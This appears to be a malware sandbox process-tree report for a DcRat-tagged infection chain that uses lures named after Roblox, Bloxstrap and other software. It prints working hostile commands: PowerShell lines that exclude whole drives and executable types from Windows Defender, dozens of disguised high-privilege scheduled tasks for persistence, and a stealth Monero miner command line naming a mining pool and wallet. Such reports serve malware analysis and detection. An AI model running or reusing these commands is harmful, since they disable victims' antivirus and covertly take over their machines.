C:\Windows\System32\cmd.exe"cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit5⤵PID:548
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"6⤵
- Command and Scripting Interpreter: PowerShell
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5564
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"6⤵
- Command and Scripting Interpreter: PowerShell
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:5160
-
-
-
C:\Windows\System32\cmd.exe"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "Bloxstrap" /tr "C:\Users\Admin\Bloxstrap.exe"5⤵PID:5188
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "Bloxstrap" /tr "C:\Users\Admin\Bloxstrap.exe"6⤵
- DcRat
- Scheduled Task/Job: Scheduled Task
PID:5980
-
-
-
C:\Windows\System32\cmd.exe"cmd" cmd /c "C:\Users\Admin\Bloxstrap.exe"5⤵PID:6500
-
C:\Users\Admin\Bloxstrap.exeC:\Users\Admin\Bloxstrap.exe6⤵PID:6576
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Users\Admin\Bloxstrap.exe"7⤵PID:3288
-
C:\Windows\System32\cmd.exe"cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit8⤵PID:4476
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"9⤵
- Command and Scripting Interpreter: PowerShell
PID:5896
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"9⤵
- Command and Scripting Interpreter: PowerShell
PID:4776
-
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"8⤵PID:3984
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "/sihost64"9⤵PID:3176
-
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=pool.hashvault.pro:80 --user=43a4sKqYaYRDJ11nnS8kk6ATe7pwz7GqaGCjueKKVcqS8V7ZgQduYQSENk7PRNr1FjgxF7TADqsRBjA5cMsYJeovSPcRAnK --pass=x --cpu-max-threads-hint=30 --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=2 --cinit-idle-cpu=90 --tls --cinit-stealth8⤵PID:5176
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Frage build.exe"C:\Users\Admin\AppData\Local\Temp\Frage build.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:3600 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\DriversavessessionDlldhcp\ghJPtatrYDLygnNWh9dEZv.vbe"4⤵
- Checks computer location settings
PID:4196 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\DriversavessessionDlldhcp\exFbRiwQoowToPhSTKSA9iYE.bat" "5⤵PID:5464
-
C:\DriversavessessionDlldhcp\Roblox.exe"C:\DriversavessessionDlldhcp/Roblox.exe"6⤵
- Modifies WinLogon for persistence
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
- Modifies registry class
PID:4168 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\0xtg3qeg\0xtg3qeg.cmdline"7⤵
- Loads dropped DLL
PID:3060 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESAE8.tmp" "c:\Users\All Users\Start Menu\CSCE598C95B4465A6B8FD381D8AE520.TMP"8⤵PID:4980
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\wn1dimlu\wn1dimlu.cmdline"7⤵
- Loads dropped DLL
PID:1652 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESBA3.tmp" "c:\Users\All Users\Templates\CSC8CA6EBD2C43546EAB5B52DFFDCC19C51.TMP"8⤵PID:5376
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\a3pul1kr\a3pul1kr.cmdline"7⤵
- Loads dropped DLL
PID:5952 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC4F.tmp" "c:\Users\Admin\Videos\CSC72B8F320E3DF4B698070F74431A6B.TMP"8⤵PID:5632
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\d4fuoeov\d4fuoeov.cmdline"7⤵
- Loads dropped DLL
- Drops file in Program Files directory
PID:5224 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESCEC.tmp" "c:\Program Files\Microsoft Office\Office16\CSC13CEFDF3D78F44CBB74210E0B4722E24.TMP"8⤵PID:1040
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\k1re5ehj\k1re5ehj.cmdline"7⤵
- Loads dropped DLL
PID:5900 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESDA7.tmp" "c:\Users\Public\CSC45678A7E34C649CB872DD19188FFFC30.TMP"8⤵PID:4504
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\eyrjm1oz\eyrjm1oz.cmdline"7⤵
- Loads dropped DLL
- Drops file in Program Files directory
PID:2040 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESE53.tmp" "c:\Program Files\Windows NT\TableTextService\en-US\CSCCF1AAFE95DF4408AFAA786A37D33121.TMP"8⤵PID:5260
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\giwyemor\giwyemor.cmdline"7⤵
- Loads dropped DLL
- Drops file in Program Files directory
PID:5280 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESF0E.tmp" "c:\Program Files\7-Zip\Lang\CSC6C23FC88DE514248B2B06EB9A779747D.TMP"8⤵PID:4260
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ekas2xo2\ekas2xo2.cmdline"7⤵
- Loads dropped DLL
PID:5592 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESFCA.tmp" "c:\Users\Admin\Music\CSCAE9C26FC32F449829EAD734848684A57.TMP"8⤵PID:5716
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\tw0wsu25\tw0wsu25.cmdline"7⤵
- Loads dropped DLL
- Drops file in Program Files directory
PID:4732 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES1085.tmp" "c:\Program Files\Windows Sidebar\CSC4DA05245C94C4B5D9D4CDA48E3EE2C5B.TMP"8⤵PID:4228
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\0vpcczse\0vpcczse.cmdline"7⤵
- Loads dropped DLL
PID:5432 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES1131.tmp" "c:\DriversavessessionDlldhcp\CSCF9A40D7E7D05445BB6D15E59BA14ADE.TMP"8⤵PID:4700
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\5m4qu4ob\5m4qu4ob.cmdline"7⤵
- Loads dropped DLL
- Drops file in System32 directory
PID:5892 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES120C.tmp" "c:\Windows\System32\CSCEDEE80FABE974800B5DBB2ADA3AD378B.TMP"8⤵PID:2940
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/'7⤵
- Command and Scripting Interpreter: PowerShell
PID:5972
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'7⤵
- Command and Scripting Interpreter: PowerShell
PID:5124
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'7⤵
- Command and Scripting Interpreter: PowerShell
PID:1808 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV18⤵PID:5492
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/DriversavessessionDlldhcp/'7⤵
- Command and Scripting Interpreter: PowerShell
PID:3756
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'7⤵
- Command and Scripting Interpreter: PowerShell
PID:5184 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV18⤵PID:4980
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'7⤵
- Command and Scripting Interpreter: PowerShell
PID:3452
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'7⤵
- Command and Scripting Interpreter: PowerShell
PID:5968
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'7⤵
- Command and Scripting Interpreter: PowerShell
PID:1956
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'7⤵
- Command and Scripting Interpreter: PowerShell
PID:2432
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'7⤵
- Command and Scripting Interpreter: PowerShell
PID:1148
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'7⤵
- Command and Scripting Interpreter: PowerShell
PID:2572
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'7⤵
- Command and Scripting Interpreter: PowerShell
PID:6028
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/winNet/'7⤵
- Command and Scripting Interpreter: PowerShell
PID:6112
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\msiexec.exe'7⤵
- Command and Scripting Interpreter: PowerShell
PID:3140
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\DriversavessessionDlldhcp\Roblox.exe'7⤵
- Command and Scripting Interpreter: PowerShell
PID:2632
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\SasmzD9Mi7.bat"7⤵PID:4256
-
C:\Windows\system32\chcp.comchcp 650018⤵PID:6116
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost8⤵
- Runs ping.exe
PID:6256
-
-
C:\DriversavessessionDlldhcp\Roblox.exe"C:\DriversavessessionDlldhcp\Roblox.exe"8⤵PID:5788
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\sddsfsdf.exe"C:\Users\Admin\AppData\Local\Temp\sddsfsdf.exe"2⤵
- Modifies WinLogon for persistence
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4048 -
C:\Windows\SYSTEM32\CMD.exe"CMD" /C SchTaSKs /CrEAte /F /sc OnLoGoN /rl HighEst /tn "Autodesk Maya" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" & exit3⤵PID:5252
-
C:\Windows\system32\schtasks.exeSchTaSKs /CrEAte /F /sc OnLoGoN /rl HighEst /tn "Autodesk Maya" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe"4⤵
- DcRat
- Scheduled Task/Job: Scheduled Task
PID:5392
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:5488
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵
- DcRat
- Scheduled Task/Job: Scheduled Task
PID:5664
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo 5 /tn "Google Chrome Update" /tr "C:\Users\Admin\Music\xdwdAdobe Illustrator.exe" /RL HIGHEST & exit3⤵PID:5752
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo 5 /tn "Google Chrome Update" /tr "C:\Users\Admin\Music\xdwdAdobe Illustrator.exe" /RL HIGHEST4⤵
- DcRat
- Scheduled Task/Job: Scheduled Task
PID:2136
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:5492
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵
- DcRat
- Scheduled Task/Job: Scheduled Task
PID:5724
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:1724
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵
- DcRat
- Scheduled Task/Job: Scheduled Task
PID:2636
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:5964
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵
- DcRat
- Scheduled Task/Job: Scheduled Task
PID:6332
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:6716
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵
- DcRat
- Scheduled Task/Job: Scheduled Task
PID:6820
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:7048
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵
- DcRat
- Scheduled Task/Job: Scheduled Task
PID:7132
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:6264
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:3060
-
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵
- DcRat
- Scheduled Task/Job: Scheduled Task
PID:6084
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:2860
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵
- DcRat
- Scheduled Task/Job: Scheduled Task
PID:6064
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:6604
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵
- DcRat
- Scheduled Task/Job: Scheduled Task
PID:6628
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:5776
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵
- DcRat
- Scheduled Task/Job: Scheduled Task
PID:4460
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:6768
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵
- DcRat
- Scheduled Task/Job: Scheduled Task
PID:7124
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:516
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵
- DcRat
- Scheduled Task/Job: Scheduled Task
PID:5988
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:2016
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:5892
-
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵
- DcRat
- Scheduled Task/Job: Scheduled Task
PID:6020
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:3756
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵
- DcRat
- Scheduled Task/Job: Scheduled Task
PID:6272
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:1944
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵
- DcRat
- Scheduled Task/Job: Scheduled Task
PID:5856
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:6024
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵
- DcRat
- Scheduled Task/Job: Scheduled Task
PID:3000
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:5132
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵
- DcRat
- Scheduled Task/Job: Scheduled Task
PID:6424
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:3224
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵
- DcRat
- Scheduled Task/Job: Scheduled Task
PID:7160
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:556
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵
- DcRat
- Scheduled Task/Job: Scheduled Task
PID:7096
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:5260
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:6920
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:4228
-
-
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Blocklisted process makes network request
- Enumerates connected drives
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4492 -
C:\Windows\System32\MsiExec.exeC:\Windows\System32\MsiExec.exe -Embedding 7F6EF5A27D212CCB16D49156F8B9A4462⤵
- Loads dropped DLL
PID:2416
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 308240B41C6B2B581EDDC761FDFE78B62⤵
- Loads dropped DLL
PID:4856
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 9 /tr "'C:\Recovery\WindowsRE\RuntimeBroker.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1540
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\RuntimeBroker.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3912
-
